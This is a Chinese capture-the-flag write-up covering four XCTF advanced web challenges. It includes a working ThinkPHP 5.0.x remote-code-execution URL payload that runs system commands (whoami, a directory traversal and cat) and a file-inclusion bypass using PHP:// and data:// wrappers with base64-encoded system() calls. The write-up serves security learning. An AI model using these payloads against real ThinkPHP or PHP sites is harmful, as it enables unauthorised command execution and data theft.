CTF_Web:攻防世界高手区进阶题WP(1-4)

作者 : 开心源码 本文共1177个字,预计阅读时间需要3分钟 发布时间: 2022-05-14 共227人阅读

0x00 前言

Web高手进阶区的题是对信息搜集、协议了解、php语法掌握等进阶知识的考查,越往后,题目越难,也不知道自己可以做到第几,持续升级吧。

0x01 baby_web

题目形容:想想初始页面是哪个
打开之后发现初始路径为1.php,平时我们使用最常见的首页面为index.php,输入url测试,发现立即跳转到了1.php,本题目考察302跳转的知识,使用burp抓包跟进就可。

0x02 Training-WWW-Robots

根据题目名称可知本题考查robots.txt知识。

根据提醒访问f10g.php就可。

0x03 php_rce

本题打开之后是tinkphp5.0框架,tinkphp作为大量使用的框架,每个版本都会有大量的漏洞爆出,本题考查对5.0版本的理解和信息搜集能力,不难找到5.0.x版本的存在rce漏洞。
payload为
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
返回了当前客户。


跨目录,cat文件就可,最终payload为
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cd..%20;cd%20..;%20cd%20..;cd%20..;ls%20flag;cat%20flag

0x04 Web_php_include

题目形容:暂无


从题目源码可以看到,这个题目不允许使用php://伪协议,但对strstr函数来说,匹配大小写,所以可以使用PHP://伪协议,data://伪协议包含恶意代码,获取敏感信息。

'php://input' 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。'data://text/plain;base64,' 将值中的base64编码解码后直接包含

在传递page这一参数的值时,要将内容使用base64编码,防止特殊字符浏览器难以识别。
本题中使用到的有

<?php system('dir');<?php system('cat xxxx.php');两句话编码后的内容。PD9waHAgc3lzdGVtKCdkaXInKTs=PD9waHAgc3lzdGVtKCdjYXQgZmw0Z2lzaXNpc2gzcjMucGhwJyk7

两种方式的传递参数都是相同的,首先列目录,再cat对应的文件。
使用page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmw0Z2lzaXNpc2gzcjMucGhwJyk7
查看源码得到falg

说明
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,您必须在下载后24小时内删除!
3. 不得使用于非法商业用途,不得违反国家法律。否则后果自负!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是摆设,本站源码仅提供给会员学习使用!
7. 如遇到加密压缩包,请使用360解压,如遇到无法解压的请联系管理员
开心源码网 » CTF_Web:攻防世界高手区进阶题WP(1-4)

发表回复